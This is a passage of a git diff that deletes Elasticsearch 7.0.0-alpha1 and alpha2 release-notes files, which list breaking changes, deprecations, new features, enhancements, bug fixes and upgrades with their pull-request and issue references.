instead of NaN when empty {es-pull}30460[#30460] (issue: {es-issue}29066[#29066]) -* Render sum as zero if count is zero for stats aggregation {es-pull}27193[#27193] (issue: {es-issue}26893[#26893]) - -Analysis:: -* Remove `delimited_payload_filter` {es-pull}27705[#27705] (issues: {es-issue}26625[#26625], {es-issue}27704[#27704]) -* Limit the number of tokens produced by _analyze {es-pull}27529[#27529] (issue: {es-issue}27038[#27038]) -* Add limits for ngram and shingle settings {es-pull}27211[#27211] (issue: {es-issue}25887[#25887]) - -Audit:: -* Logfile auditing settings remove after deprecation {es-pull}35205[#35205] - -Authentication:: -* Security: remove wrapping in put user response {es-pull}33512[#33512] (issue: {es-issue}32332[#32332]) - -Authorization:: -* Remove aliases resolution limitations when security is enabled {es-pull}31952[#31952] (issue: {es-issue}31516[#31516]) - -CRUD:: -* Version conflict exception message enhancement {es-pull}29432[#29432] (issue: {es-issue}21278[#21278]) -* Using ObjectParser in UpdateRequest {es-pull}29293[#29293] (issue: {es-issue}28740[#28740]) - -Distributed:: -* Remove undocumented action.master.force_local setting {es-pull}29351[#29351] -* Remove tribe node support {es-pull}28443[#28443] -* Forbid negative values for index.unassigned.node_left.delayed_timeout {es-pull}26828[#26828] - -Features/Indices APIs:: -* Indices Exists API should return 404 for empty wildcards {es-pull}34499[#34499] -* Default to one shard {es-pull}30539[#30539] -* Limit the number of nested documents {es-pull}27405[#27405] (issue: {es-issue}26962[#26962]) - -Features/Ingest:: -* INGEST: Add Configuration Except. Data to Metdata {es-pull}32322[#32322] (issue: {es-issue}27728[#27728]) - -Features/Stats:: -* Remove the suggest metric from stats APIs {es-pull}29635[#29635] (issue: {es-issue}29589[#29589]) -* Align cat thread pool info to thread pool config {es-pull}29195[#29195] (issue: {es-issue}29123[#29123]) -* Align thread pool info to thread pool configuration {es-pull}29123[#29123] (issue: {es-issue}29113[#29113]) - -Geo:: -* Use geohash cell instead of just a corner in geo_bounding_box {es-pull}30698[#30698] (issue: {es-issue}25154[#25154]) - -Infra/Circuit Breakers:: -* Introduce durability of circuit breaking exception {es-pull}34460[#34460] (issue: {es-issue}31986[#31986]) -* Circuit-break based on real memory usage {es-pull}31767[#31767] - -Infra/Core:: -* Core: Default node.name to the hostname {es-pull}33677[#33677] -* Remove bulk fallback for write thread pool {es-pull}29609[#29609] -* CCS: Drop http address from remote cluster info {es-pull}29568[#29568] (issue: {es-issue}29207[#29207]) -* Remove the index thread pool {es-pull}29556[#29556] -* Main response should not have status 503 when okay {es-pull}29045[#29045] (issue: {es-issue}8902[#8902]) -* Automatically prepare indices for splitting {es-pull}27451[#27451] -* Don't refresh on `_flush` `_force_merge` and `_upgrade` {es-pull}27000[#27000] (issue: {es-issue}26972[#26972]) - -Infra/Packaging:: -* Packaging: Remove windows bin files from the tar distribution {es-pull}30596[#30596] - -Infra/REST API:: -* REST: Remove GET support for clear cache indices {es-pull}29525[#29525] -* REST : Clear Indices Cache API remove deprecated url params {es-pull}29068[#29068] - -Infra/Scripting:: -* Remove support for deprecated StoredScript contexts {es-pull}31394[#31394] (issues: {es-issue}27612[#27612], {es-issue}28939[#28939]) -* Scripting: Remove getDate methods from ScriptDocValues {es-pull}30690[#30690] -* Handle missing and multiple values in script {es-pull}29611[#29611] (issue: {es-issue}29286[#29286]) -* Drop `ScriptDocValues#date` and `ScriptDocValues#dates` in 7.0.0 [ISSUE] {es-pull}23008[#23008] - -Infra/Settings:: -* Remove config prompting for secrets and text {es-pull}27216[#27216] - -Mapping:: -* Match phrase queries against non-indexed fields should throw an exception {es-pull}31060[#31060] -* Remove legacy mapping code. {es-pull}29224[#29224] -* Reject updates to the `_default_` mapping. {es-pull}29165[#29165] (issues: {es-issue}15613[#15613], {es-issue}28248[#28248]) -* Remove the `update_all_types` option. {es-pull}28288[#28288] -* Remove the `_default_` mapping. {es-pull}28248[#28248] -* Reject the `index_options` parameter for numeric fields {es-pull}26668[#26668] (issue: {es-issue}21475[#21475]) - -Network:: -* Network: Remove http.enabled setting {es-pull}29601[#29601] (issue: {es-issue}12792[#12792]) -* Remove HTTP max content length leniency {es-pull}29337[#29337] - -Percolator:: -* remove deprecated percolator map_unmapped_fields_as_string setting {es-pull}28060[#28060] - -Ranking:: -* Add minimal sanity checks to custom/scripted similarities. {es-pull}33564[#33564] (issue: {es-issue}33309[#33309]) -* Scroll queries asking for rescore are considered invalid {es-pull}32918[#32918] (issue: {es-issue}31775[#31775]) - -Search:: -* Remove deprecated url parameters `_source_include` and `_source_exclude` {es-pull}35097[#35097] (issues: {es-issue}22792[#22792], {es-issue}33475[#33475]) -* Disallow negative query boost {es-pull}34486[#34486] (issue: {es-issue}33309[#33309]) -* Forbid negative `weight` in Function Score Query {es-pull}33390[#33390] (issue: {es-issue}31927[#31927]) -* In the field capabilities API, remove support for providing fields in the request body. {es-pull}30185[#30185] -* Remove deprecated options for query_string {es-pull}29203[#29203] (issue: {es-issue}25551[#25551]) -* Fix Laplace scorer to multiply by alpha (and not add) {es-pull}27125[#27125] -* Remove _primary and _replica shard preferences {es-pull}26791[#26791] (issue: {es-issue}26335[#26335]) -* Limit the number of expanded fields it query_string and simple_query_string {es-pull}26541[#26541] (issue: {es-issue}25105[#25105]) -* Make purely negative queries return scores of 0. {es-pull}26015[#26015] (issue: {es-issue}23449[#23449]) - -Snapshot/Restore:: -* Include size of snapshot in snapshot metadata {es-pull}30890[#30890] (issue: {es-issue}18543[#18543]) -* Remove azure deprecated settings {es-pull}26099[#26099] (issue: {es-issue}23405[#23405]) - -Store:: -* drop elasticsearch-translog for 7.0 {es-pull}33373[#33373] (issues: {es-issue}31389[#31389], {es-issue}32281[#32281]) -* completely drop `index.shard.check_on_startup: fix` for 7.0 {es-pull}33194[#33194] - -Suggesters:: -* Fix threshold frequency computation in Suggesters {es-pull}34312[#34312] (issue: {es-issue}34282[#34282]) -* Make Geo Context Mapping Parsing More Strict {es-pull}32821[#32821] (issues: {es-issue}32202[#32202], {es-issue}32412[#32412]) -* Make Geo Context Parsing More Strict {es-pull}32412[#32412] (issue: {es-issue}32202[#32202]) -* Remove the ability to index or query context suggestions without context {es-pull}31007[#31007] (issue: {es-issue}30712[#30712]) - - - -[[breaking-java-7.0.0-alpha1]] -[discrete] -=== Breaking Java changes - -Aggregations:: -* Change GeoHashGrid.Bucket#getKey() to return String {es-pull}31748[#31748] (issue: {es-issue}30320[#30320]) - -Analysis:: -* Remove deprecated AnalysisPlugin#requriesAnalysisSettings method {es-pull}32037[#32037] (issue: {es-issue}32025[#32025]) - -Features/Java High Level REST Client:: -* API: Drop deprecated methods from Retry {es-pull}33925[#33925] -* REST hl client: cluster health to default to cluster level {es-pull}31268[#31268] (issue: {es-issue}29331[#29331]) -* REST high-level Client: remove deprecated API methods {es-pull}31200[#31200] (issue: {es-issue}31069[#31069]) - -Features/Java Low Level REST Client:: -* LLREST: Drop deprecated methods {es-pull}33223[#33223] (issues: {es-issue}29623[#29623], {es-issue}30315[#30315]) - -Geo:: -* [Geo] Decouple geojson parse logic from ShapeBuilders {es-pull}27212[#27212] - -Infra/Core:: -* Core: Remove RequestBuilder from Action {es-pull}30966[#30966] - -Infra/Transport API:: -* Java api clean up: remove deprecated `isShardsAcked` {es-pull}28311[#28311] (issues: {es-issue}27784[#27784], {es-issue}27819[#27819]) - -[[deprecation-7.0.0-alpha1]] -[discrete] -=== Deprecations - -Analysis:: -* Replace parameter unicodeSetFilter with unicode_set_filter {es-pull}29215[#29215] (issue: {es-issue}22823[#22823]) -* Replace delimited_payload_filter by delimited_payload {es-pull}26625[#26625] (issue: {es-issue}21978[#21978]) - -Features/Indices APIs:: -* Default copy settings to true and deprecate on the REST layer {es-pull}30598[#30598] - -Infra/Transport API:: -* Deprecate the transport client in favour of the high-level REST client {es-pull}27085[#27085] - -Mapping:: -* Deprecate type exists requests. {es-pull}34663[#34663] - -Search:: -* Deprecate filtering on `_type`. {es-pull}29468[#29468] (issue: {es-issue}15613[#15613]) - - - -[[feature-7.0.0-alpha1]] -[discrete] -=== New features - -Analysis:: -* Relax TermVectors API to work with textual fields other than TextFieldType {es-pull}31915[#31915] (issue: {es-issue}31902[#31902]) - -CCR:: -* Generalize search.remote settings to cluster.remote {es-pull}33413[#33413] - -Distributed:: -* log messages from allocation commands {es-pull}25955[#25955] (issues: {es-issue}22821[#22821], {es-issue}25325[#25325]) - -Features/Ingest:: -* Revert "Introduce a Hashing Processor (#31087)" {es-pull}32178[#32178] -* Add ingest-attachment support for per document `indexed_chars` limit {es-pull}28977[#28977] (issue: {es-issue}28942[#28942]) - -Features/Java High Level REST Client:: -* GraphClient for the high level REST client and associated tests {es-pull}32366[#32366] - -Features/Monitoring:: -* [Elasticsearch Monitoring] Collect only display_name (for now) {es-pull}35265[#35265] (issue: {es-issue}8445[#8445]) - -Infra/Core:: -* Skip shard refreshes if shard is `search idle` {es-pull}27500[#27500] - -Infra/Logging:: -* Logging: Unify log rotation for index/search slow log {es-pull}27298[#27298] - -Infra/Plugins:: -* Reload secure settings for plugins {es-pull}31383[#31383] (issue: {es-issue}29135[#29135]) - -Infra/REST API:: -* Add an `include_type_name` option. {es-pull}29453[#29453] (issue: {es-issue}15613[#15613]) - -Machine Learning:: -* [ML] Filter undefined job groups from update job calendar actions {es-pull}30757[#30757] - -Mapping:: -* Add a `feature_vector` field. {es-pull}31102[#31102] (issue: {es-issue}27552[#27552]) -* Expose Lucene's FeatureField. {es-pull}30618[#30618] - -Ranking:: -* Add ranking evaluation API {es-pull}27478[#27478] (issue: {es-issue}19195[#19195]) - -Recovery:: -* Allow to trim all ops above a certain seq# with a term lower than X, … {es-pull}31211[#31211] (issue: {es-issue}10708[#10708]) - -SQL:: -* SQL: Add basic support for ST_AsWKT geo function {es-pull}34205[#34205] -* SQL: Add support for SYS GEOMETRY_COLUMNS {es-pull}30496[#30496] (issue: {es-issue}29872[#29872]) - -Search:: -* Add “took” timing info to response for _msearch/template API {es-pull}30961[#30961] (issue: {es-issue}30957[#30957]) -* Expose the lucene Matches API to searches [ISSUE] {es-pull}29631[#29631] -* Add allow_partial_search_results flag to search requests with default setting true {es-pull}28440[#28440] (issue: {es-issue}27435[#27435]) -* Enable adaptive replica selection by default {es-pull}26522[#26522] (issue: {es-issue}24915[#24915]) - -Suggesters:: -* serialize suggestion responses as named writeables {es-pull}30284[#30284] (issue: {es-issue}26585[#26585]) - - - -[[enhancement-7.0.0-alpha1]] -[discrete] -=== Enhancements - -Aggregations:: -* Uses MergingDigest instead of AVLDigest in percentiles agg {es-pull}28702[#28702] (issue: {es-issue}19528[#19528]) - -Discovery-Plugins:: -* Rename discovery.zen.minimum_master_nodes [ISSUE] {es-pull}14058[#14058] - -Engine:: -* Remove versionType from translog {es-pull}31945[#31945] -* do retry if primary fails on AsyncAfterWriteAction {es-pull}31857[#31857] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* handle AsyncAfterWriteAction exception before listener is registered {es-pull}31755[#31755] (issue: {es-issue}31716[#31716]) -* Use IndexWriter#flushNextBuffer to free memory {es-pull}27753[#27753] -* Remove pre 6.0.0 support from InternalEngine {es-pull}27720[#27720] - -Features/Indices APIs:: -* Add cluster-wide shard limit {es-pull}32856[#32856] (issue: {es-issue}20705[#20705]) -* Remove RestGetAllAliasesAction {es-pull}31308[#31308] (issue: {es-issue}31129[#31129]) -* Add rollover-creation-date setting to rolled over index {es-pull}31144[#31144] (issue: {es-issue}30887[#30887]) -* add is-write-index flag to aliases {es-pull}30942[#30942] -* Make index and bulk APIs work without types. {es-pull}29479[#29479] - -Features/Ingest:: -* ingest: Add ignore_missing property to foreach filter (#22147) {es-pull}31578[#31578] (issue: {es-issue}22147[#22147]) - -Features/Java High Level REST Client:: -* HLRC API for _termvectors {es-pull}32610[#32610] (issue: {es-issue}27205[#27205]) - -Features/Stats:: -* Stats to record how often the ClusterState diff mechanism is used successfully {es-pull}26973[#26973] - -Features/Watcher:: -* Watcher: Validate email adresses when storing a watch {es-pull}34042[#34042] (issue: {es-issue}33980[#33980]) - -Infra/Circuit Breakers:: -* Have circuit breaker succeed on unknown mem usage {es-pull}33125[#33125] (issue: {es-issue}31767[#31767]) -* Account for XContent overhead in in-flight breaker {es-pull}31613[#31613] -* Script Stats: Add compilation limit counter to stats {es-pull}26387[#26387] - -Infra/Core:: -* Add RunOnce utility class that executes a Runnable exactly once {es-pull}35484[#35484] -* Improved IndexNotFoundException's default error message {es-pull}34649[#34649] (issue: {es-issue}34628[#34628]) -* Set a bounded default for http.max_warning_header_count [ISSUE] {es-pull}33479[#33479] - -Infra/Packaging:: -* Choose JVM options ergonomically {es-pull}30684[#30684] - -Infra/REST API:: -* Remove hand-coded XContent duplicate checks {es-pull}34588[#34588] (issues: {es-issue}22073[#22073], {es-issue}22225[#22225], {es-issue}22253[#22253]) -* Add the `include_type_name` option to the search and document APIs. {es-pull}29506[#29506] (issue: {es-issue}15613[#15613]) -* Validate `op_type` for `_create` {es-pull}27483[#27483] - -Infra/Scripting:: -* Tests: Add support for custom contexts to mock scripts {es-pull}34100[#34100] -* Scripting: Reflect factory signatures in painless classloader {es-pull}34088[#34088] -* Handle missing values in painless {es-pull}32207[#32207] (issue: {es-issue}29286[#29286]) - -Infra/Settings:: -* Settings: Add keystore creation to add commands {es-pull}26126[#26126] - -Infra/Transport API:: -* Change BWC version for VerifyRepositoryResponse {es-pull}30796[#30796] (issue: {es-issue}30762[#30762]) - -Network:: -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Add class for serializing message to bytes {es-pull}29384[#29384] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) - -Ranking:: -* Add k parameter to PrecisionAtK metric {es-pull}27569[#27569] - -SQL:: -* SQL: Introduce support for NULL values {es-pull}34573[#34573] (issue: {es-issue}32079[#32079]) - -Search:: -* Make limit on number of expanded fields configurable {es-pull}35284[#35284] (issues: {es-issue}26541[#26541], {es-issue}34778[#34778]) -* Search: Simply SingleFieldsVisitor {es-pull}34052[#34052] -* Don't count hits via the collector if the hit count can be computed from index stats. {es-pull}33701[#33701] -* Limit the number of concurrent requests per node {es-pull}31206[#31206] (issue: {es-issue}31192[#31192]) -* Default max concurrent search req. numNodes * 5 {es-pull}31171[#31171] (issues: {es-issue}30783[#30783], {es-issue}30994[#30994]) -* Change ScriptException status to 400 (bad request) {es-pull}30861[#30861] (issue: {es-issue}12315[#12315]) -* Change default value to true for transpositions parameter of fuzzy query {es-pull}26901[#26901] -* Introducing "took" time (in ms) for `_msearch` {es-pull}23767[#23767] (issue: {es-issue}23131[#23131]) - -Snapshot/Restore:: -* #31608 Add S3 Setting to Force Path Type Access {es-pull}34721[#34721] (issue: {es-issue}31608[#31608]) - -Store:: -* add RemoveCorruptedShardDataCommand {es-pull}32281[#32281] (issues: {es-issue}31389[#31389], {es-issue}32279[#32279]) - -ZenDiscovery:: -* [Zen2] Introduce vote withdrawal {es-pull}35446[#35446] -* Zen2: Add basic Zen1 transport-level BWC {es-pull}35443[#35443] -* Zen2: Add diff-based publishing {es-pull}35290[#35290] -* [Zen2] Introduce auto_shrink_voting_configuration setting {es-pull}35217[#35217] -* Introduce transport API for cluster bootstrapping {es-pull}34961[#34961] -* [Zen2] Reconfigure cluster as its membership changes {es-pull}34592[#34592] (issue: {es-issue}33924[#33924]) -* Zen2: Fail fast on disconnects {es-pull}34503[#34503] -* [Zen2] Add storage-layer disruptions to CoordinatorTests {es-pull}34347[#34347] -* [Zen2] Add low-level bootstrap implementation {es-pull}34345[#34345] -* [Zen2] Gather votes from all nodes {es-pull}34335[#34335] -* Zen2: Add Cluster State Applier {es-pull}34257[#34257] -* [Zen2] Add safety phase to CoordinatorTests {es-pull}34241[#34241] -* [Zen2] Integrate FollowerChecker with Coordinator {es-pull}34075[#34075] -* Integrate LeaderChecker with Coordinator {es-pull}34049[#34049] -* Zen2: Trigger join when active master detected {es-pull}34008[#34008] -* Zen2: Update PeerFinder term on term bump {es-pull}33992[#33992] -* [Zen2] Calculate optimal cluster configuration {es-pull}33924[#33924] -* [Zen2] Introduce FollowersChecker {es-pull}33917[#33917] -* Zen2: Integrate publication pipeline into Coordinator {es-pull}33771[#33771] -* Zen2: Add DisruptableMockTransport {es-pull}33713[#33713] -* [Zen2] Implement basic cluster formation {es-pull}33668[#33668] -* [Zen2] Introduce LeaderChecker {es-pull}33024[#33024] -* Zen2: Add leader-side join handling logic {es-pull}33013[#33013] -* [Zen2] Add PeerFinder#onFoundPeersUpdated {es-pull}32939[#32939] -* [Zen2] Introduce PreVoteCollector {es-pull}32847[#32847] -* [Zen2] Introduce ElectionScheduler {es-pull}32846[#32846] -* [Zen2] Introduce ElectionScheduler {es-pull}32709[#32709] -* [Zen2] Add HandshakingTransportAddressConnector {es-pull}32643[#32643] (issue: {es-issue}32246[#32246]) -* [Zen2] Add UnicastConfiguredHostsResolver {es-pull}32642[#32642] (issue: {es-issue}32246[#32246]) -* Zen2: Cluster state publication pipeline {es-pull}32584[#32584] (issue: {es-issue}32006[#32006]) -* [Zen2] Introduce gossip-like discovery of master nodes {es-pull}32246[#32246] -* Add core coordination algorithm for cluster state publishing {es-pull}32171[#32171] (issue: {es-issue}32006[#32006]) -* Add term and config to cluster state {es-pull}32100[#32100] (issue: {es-issue}32006[#32006]) - - - -[[bug-7.0.0-alpha1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix InternalAutoDateHistogram reproducible failure {es-pull}32723[#32723] (issue: {es-issue}32215[#32215]) - -Analysis:: -* Close #26771: beider_morse phonetic encoder failure when languageset unspecified {es-pull}26848[#26848] (issue: {es-issue}26771[#26771]) - -Authorization:: -* Empty GetAliases authorization fix {es-pull}34444[#34444] (issue: {es-issue}31952[#31952]) - -Docs Infrastructure:: -* Docs build fails due to missing nexus.png [ISSUE] {es-pull}33101[#33101] - -Features/Indices APIs:: -* Validate top-level keys for create index request (#23755) {es-pull}23869[#23869] (issue: {es-issue}23755[#23755]) - -Features/Ingest:: -* INGEST: Fix Deprecation Warning in Script Proc. {es-pull}32407[#32407] - -Features/Java High Level REST Client:: -* HLRC: Drop extra level from user parser {es-pull}34932[#34932] - -Features/Java Low Level REST Client:: -* Remove I/O pool blocking sniffing call from onFailure callback, add some logic around host exclusion {es-pull}27985[#27985] (issue: {es-issue}27984[#27984]) - -Features/Watcher:: -* Watcher: Ignore system locale/timezone in croneval CLI tool {es-pull}33215[#33215] - -Geo:: -* [build] Test `GeoShapeQueryTests#testPointsOnly` fails [ISSUE] {es-pull}27454[#27454] - -Infra/Core:: -* Ensure shard is refreshed once it's inactive {es-pull}27559[#27559] (issue: {es-issue}27500[#27500]) - -Infra/Settings:: -* Change format how settings represent lists / array {es-pull}26723[#26723] - -Infra/Transport API:: -* Remove version read/write logic in Verify Response {es-pull}30879[#30879] (issue: {es-issue}30807[#30807]) -* Enable muted Repository test {es-pull}30875[#30875] (issue: {es-issue}30807[#30807]) -* Bad regex in CORS settings should throw a nicer error {es-pull}29108[#29108] - -License:: -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) - -Mapping:: -* Ensure that field aliases cannot be used in multi-fields. {es-pull}32219[#32219] - -Network:: -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Netty4SizeHeaderFrameDecoder error {es-pull}31057[#31057] -* Fix memory leak in http pipelining {es-pull}30815[#30815] (issue: {es-issue}30801[#30801]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] - -Search:: -* Ensure realtime `_get` and `_termvectors` don't run on the network thread {es-pull}33814[#33814] (issue: {es-issue}27500[#27500]) -* [bug] fuzziness custom auto {es-pull}33462[#33462] (issue: {es-issue}33454[#33454]) -* Fix inner hits retrieval when stored fields are disabled (_none_) {es-pull}33018[#33018] (issue: {es-issue}32941[#32941]) -* Set maxScore for empty TopDocs to Nan rather than 0 {es-pull}32938[#32938] -* Handle leniency for cross_fields type in multi_match query {es-pull}27045[#27045] (issue: {es-issue}23210[#23210]) -* Raise IllegalArgumentException instead if query validation failed {es-pull}26811[#26811] (issue: {es-issue}26799[#26799]) - -Security:: -* Handle 6.4.0+ BWC for Application Privileges {es-pull}32929[#32929] - -ZenDiscovery:: -* [Zen2] Remove duplicate discovered peers {es-pull}35505[#35505] - - -[[upgrade-7.0.0-alpha1]] -[discrete] -=== Upgrades - -Geo:: -* Upgrade JTS to 1.14.0 {es-pull}29141[#29141] (issue: {es-issue}29122[#29122]) - -Infra/Core:: -* Upgrade to a Lucene 8 snapshot {es-pull}33310[#33310] (issues: {es-issue}32899[#32899], {es-issue}33028[#33028], {es-issue}33309[#33309]) - -Network:: -* NETWORKING: Fix Netty Leaks by upgrading to 4.1.28 {es-pull}32511[#32511] (issue: {es-issue}32487[#32487]) diff --git a/docs/reference/release-notes/7.0.0-alpha2.asciidoc b/docs/reference/release-notes/7.0.0-alpha2.asciidoc deleted file mode 100644 index d9b23c9aad9..00000000000 --- a/docs/reference/release-notes/7.0.0-alpha2.asciidoc +++ /dev/null @@ -1,585 +0,0 @@ -[[release-notes-7.0.0-alpha2]] -== {es} version 7.0.0-alpha2 - -[[breaking-7.0.0-alpha2]] -[discrete] -=== Breaking changes - -Authentication:: -* Enhance Invalidate Token API {es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Circuit Breakers:: -* Lower fielddata circuit breaker's default limit {es-pull}27162[#27162] (issue: {es-issue}27130[#27130]) - -CCR:: -* Change get autofollow patterns API response format {es-pull}36203[#36203] (issue: {es-issue}36049[#36049]) - -Index APIs:: -* Always enforce cluster-wide shard limit {es-pull}34892[#34892] (issues: {es-issue}20705[#20705], {es-issue}34021[#34021]) - -Ranking:: -* Forbid negative scores in function_score query {es-pull}35709[#35709] (issue: {es-issue}33309[#33309]) - -Scripting:: -* Delete deprecated getValues from ScriptDocValues {es-pull}36183[#36183] (issue: {es-issue}22919[#22919]) - -Search:: -* Remove the deprecated _termvector endpoint. {es-pull}36131[#36131] (issues: {es-issue}36098[#36098], {es-issue}8484[#8484]) -* Remove deprecated Graph endpoints {es-pull}35956[#35956] -* Validate metadata on `_msearch` {es-pull}35938[#35938] (issue: {es-issue}35869[#35869]) -* Make hits.total an object in the search response {es-pull}35849[#35849] (issue: {es-issue}33028[#33028]) -* Remove the distinction between query and filter context in QueryBuilders {es-pull}35354[#35354] (issue: {es-issue}35293[#35293]) -* Throw a parsing exception when boost is set in span_or query (#28390) {es-pull}34112[#34112] (issue: {es-issue}28390[#28390]) - -ZenDiscovery:: -* Best-effort cluster formation if unconfigured {es-pull}36215[#36215] - -[[breaking-java-7.0.0-alpha2]] -[discrete] -=== Breaking Java changes - -ZenDiscovery:: -* Make node field in JoinRequest private {es-pull}36405[#36405] - -[[deprecation-7.0.0-alpha2]] -[discrete] -=== Deprecations - -Core:: -* Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] -* Add backcompat for joda time formats {es-pull}36531[#36531] - -Machine Learning:: -* Deprecate X-Pack centric ML endpoints {es-pull}36315[#36315] (issue: {es-issue}35958[#35958]) - -Mapping:: -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate uses of _type as a field name in queries {es-pull}36503[#36503] (issue: {es-issue}35190[#35190]) -* Deprecate types in update_by_query and delete_by_query {es-pull}36365[#36365] (issue: {es-issue}35190[#35190]) -* For msearch templates, make sure to use the right name for deprecation logging. {es-pull}36344[#36344] -* Deprecate types in termvector and mtermvector requests. {es-pull}36182[#36182] -* Deprecate types in update requests. {es-pull}36181[#36181] -* Deprecate types in document delete requests. {es-pull}36087[#36087] -* Deprecate types in get, exists, and multi get. {es-pull}35930[#35930] -* Deprecate types in search and multi search templates. {es-pull}35669[#35669] -* Deprecate types in explain requests. {es-pull}35611[#35611] -* Deprecate types in validate query requests. {es-pull}35575[#35575] -* Deprecate types in count and msearch. {es-pull}35421[#35421] (issue: {es-issue}34041[#34041]) - -Migration:: -* Deprecate X-Pack centric Migration endpoints {es-pull}35976[#35976] (issue: {es-issue}35958[#35958]) - -Monitoring:: -* Deprecate /_xpack/monitoring/* in favor of /_monitoring/* {es-pull}36130[#36130] (issue: {es-issue}35958[#35958]) - -Rollup:: -* Re-deprecate xpack rollup endpoints {es-pull}36451[#36451] (issue: {es-issue}36044[#36044]) -* Deprecate X-Pack centric rollup endpoints {es-pull}35962[#35962] (issue: {es-issue}35958[#35958]) - -Scripting:: -* Adds deprecation logging to ScriptDocValues#getValues. {es-pull}34279[#34279] (issue: {es-issue}22919[#22919]) -* Conditionally use java time api in scripting {es-pull}31441[#31441] - -Search:: -* Remove X-Pack centric graph endpoints {es-pull}36010[#36010] (issue: {es-issue}35958[#35958]) - -Security:: -* Deprecate X-Pack centric license endpoints {es-pull}35959[#35959] (issue: {es-issue}35958[#35958]) -* Deprecate /_xpack/security/* in favor of /_security/* {es-pull}36293[#36293] (issue: {es-issue}35958[#35958]) - -SQL:: -* Deprecate X-Pack SQL translate endpoint {es-pull}36030[#36030] -* Deprecate X-Pack centric SQL endpoints {es-pull}35964[#35964] (issue: {es-issue}35958[#35958]) - -Watcher:: -* Deprecate X-Pack centric watcher endpoints {es-pull}36218[#36218] (issue: {es-issue}35958[#35958]) - - -[[feature-7.0.0-alpha2]] -[discrete] -=== New features - -Analysis:: -* Add support for inlined user dictionary in Nori {es-pull}36123[#36123] (issue: {es-issue}35842[#35842]) -* Add a prebuilt ICU Analyzer {es-pull}34958[#34958] (issue: {es-issue}34285[#34285]) - -Java High Level REST Client:: -* Add rollup search {es-pull}36334[#36334] (issue: {es-issue}29827[#29827]) - -Java Low Level REST Client:: -* Make warning behavior pluggable per request {es-pull}36345[#36345] -* Add PreferHasAttributeNodeSelector {es-pull}36005[#36005] - -Geo:: -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Machine Learning:: -* Add delayed datacheck to the datafeed job runner {es-pull}35387[#35387] (issue: {es-issue}35131[#35131]) - -Mapping:: -* Make typeless APIs usable with indices whose type name is different from `_doc` {es-pull}35790[#35790] (issue: {es-issue}35190[#35190]) - -SQL:: -* Introduce HISTOGRAM grouping function {es-pull}36510[#36510] (issue: {es-issue}36509[#36509]) -* DATABASE() and USER() system functions {es-pull}35946[#35946] (issue: {es-issue}35863[#35863]) -* Introduce INTERVAL support {es-pull}35521[#35521] (issue: {es-issue}29990[#29990]) - -Search:: -* Add intervals query {es-pull}36135[#36135] (issues: {es-issue}29636[#29636], {es-issue}32406[#32406]) -* Added soft limit to open scroll contexts #25244 {es-pull}36009[#36009] (issue: {es-issue}25244[#25244]) - -[[enhancement-7.0.0-alpha2]] -[discrete] -=== Enhancements - -Aggregations:: -* Added keyed response to pipeline percentile aggregations 22302 {es-pull}36392[#36392] (issue: {es-issue}22302[#22302]) -* Enforce max_buckets limit only in the final reduction phase {es-pull}36152[#36152] (issues: {es-issue}32125[#32125], {es-issue}35921[#35921]) -* Histogram aggs: add empty buckets only in the final reduce step {es-pull}35921[#35921] -* Handles exists query in composite aggs {es-pull}35758[#35758] -* Added parent validation for auto date histogram {es-pull}35670[#35670] - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) -* Ensure TokenFilters only produce single tokens when parsing synonyms {es-pull}34331[#34331] (issue: {es-issue}34298[#34298]) - -Audit:: -* Add "request.id" to file audit logs {es-pull}35536[#35536] - -Authentication:: -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Add DEBUG/TRACE logs for LDAP bind {es-pull}36028[#36028] -* Add Tests for findSamlRealm {es-pull}35905[#35905] -* Add realm information for Authenticate API {es-pull}35648[#35648] -* Formal support for "password_hash" in Put User {es-pull}35242[#35242] (issue: {es-issue}34729[#34729]) - -Authorization:: -* Improve exact index matching performance {es-pull}36017[#36017] -* `manage_token` privilege for `kibana_system` {es-pull}35751[#35751] -* Grant .tasks access to kibana_system role {es-pull}35573[#35573] - -Build:: -* Sounds like typo in exception message {es-pull}35458[#35458] -* Allow set section in setup section of REST tests {es-pull}34678[#34678] - -CCR:: -* Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Clean followed leader index UUIDs in auto follow metadata {es-pull}36408[#36408] (issue: {es-issue}33007[#33007]) -* Change AutofollowCoordinator to use wait_for_metadata_version {es-pull}36264[#36264] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Refactor AutoFollowCoordinator to track leader indices per remote cluster {es-pull}36031[#36031] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) - -Core:: -* Override the JVM DNS cache policy {es-pull}36570[#36570] -* Replace usages of AtomicBoolean based 